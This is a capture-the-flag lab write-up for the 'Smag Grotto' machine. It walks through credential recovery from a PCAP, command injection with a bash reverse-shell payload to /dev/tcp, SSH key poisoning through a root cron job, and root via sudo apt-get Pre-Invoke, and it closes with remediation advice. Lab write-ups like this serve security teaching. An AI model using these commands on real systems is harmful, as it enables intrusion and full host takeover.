Target IP: smag.thm (Requires /etc/hosts entry)
Difficulty: Easy/Medium
Objective: User (jake) & Root (root.txt) Flags
1. Executive Summary
“Smag Grotto” is a Linux machine that simulates a development environment. Initial reconnaissance involves analyzing a packet capture (PCAP) file found on a hidden web directory to recover legacy credentials and discover a hidden development subdomain. Initial access is gained via Command Injection on a login panel. Privilege escalation to the user jake is achieved by poisoning a public key backup file that a system cron job blindly restores to the user’s authorized_keys. Root access is obtained by exploiting Sudo privileges on the apt-get binary.
Key TTPs (MITRE ATT&CK):
- T1040 (Network Sniffing): Analyzing PCAP files for credentials.
- T1596 (Search Open Websites/Domains): Finding subdomains via traffic analysis.
- T1059.004 (Command and Scripting Interpreter): Bash Command Injection for RCE.
- T1053 (Scheduled Task/Job): Exploiting a backup restoration cron job.
- T1548.003 (Sudo and Sudo Caching): Exploiting
sudo apt-get(GTFOBins).
2. Enumeration
A. Network Scanning
The Nmap scan reveals the standard entry points.
- 22/tcp (SSH): OpenSSH 7.2p2.
- 80/tcp (HTTP): Apache Web Server.
B. Web Enumeration
Fuzzing the main site (smag.thm) reveals a critical directory:
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://smag.thm/FUZZ
# Result: /mailInside /mail, we find a conversation about network migration and a downloadable file: dHJhY2Uy.pcap.
C. Forensics: The PCAP Analysis
This is the pivotal step. You analyzed the PCAP in Wireshark.
- Filter:
http.request.method == "POST"(To find login attempts). - Findings:
- Host:
development.smag.thm(A new subdomain!). - Credentials:
helpdesk:cH4nG3M3_n0w.
Action: Add the new domain to your hosts file.
echo "10.10.x.x development.smag.thm" | sudo tee -a /etc/hosts3. Initial Access: Command Injection
A. The Login
Navigate to http://development.smag.thm and log in with the helpdesk credentials found in the PCAP.
B. The Exploit
The dashboard likely executes a command based on your input. Payload:
bash -c 'exec bash -i &>/dev/tcp/10.10.YOUR.IP/6969 <&1'- Why this works: The application takes user input and passes it to a system shell (like
pingorecho). By using valid bash syntax, we force it to spawn a reverse shell back to us.
Status: Shell as www-data.
4. Lateral Movement: The “Backup” Poisoning
A. Enumeration
You checked cat /etc/crontab and found a very interesting job running as root:
* * * * * root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keysAnalysis:
- Every minute, the system takes the content of
/opt/.backups/jake_id_rsa.pub.backup. - It overwrites
jake’sauthorized_keysfile with that content. - The Flaw:
ls -l /opt/.backups/shows the file is world-writable (or writable bywww-data).
B. The Exploit (SSH Key Injection)
We can replace the “backup” with our own Public Key. When the cron job runs, it will install our key into Jake’s account, giving us SSH access.
- Generate Key (Attacker Machine):
ssh-keygen -f mykey- Poison the File (Victim Machine):
Copy the content of
mykey.pub:
echo "ssh-rsa AAAAB3..." > /opt/.backups/jake_id_rsa.pub.backup- Wait: Wait 60 seconds for the cron job to trigger.
- Login:
ssh -i mykey jake@smag.thmStatus: User jake.
5. Privilege Escalation: Sudo Apt-Get
A. Enumeration
Checking sudo rights:
sudo -l
# (ALL : ALL) NOPASSWD: /usr/bin/apt-getB. The Exploit (GTFOBins)
apt-get allows running commands via configuration options (Pre-Invoke). This executes a command before the update process starts.
Command:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/shResult: The system spawns a shell as root.
# whoami
rootRoot Flag: /root/root.txt.
6. Remediation (Blue Team)
- Backup Permissions: Backup files (
/opt/.backups) should never be writable by unprivileged users (www-data). - Cron Hygiene: Avoid cron jobs that blindly overwrite security-critical files (
authorized_keys) from untrusted sources. - Sudo Configuration: Do not grant
NOPASSWDsudo rights to package managers likeapt-get,yum, ordpkg, as they effectively grant root shell access. - Traffic Encryption: The PCAP showed login credentials in cleartext (
HTTP). UseHTTPSto prevent credential sniffing.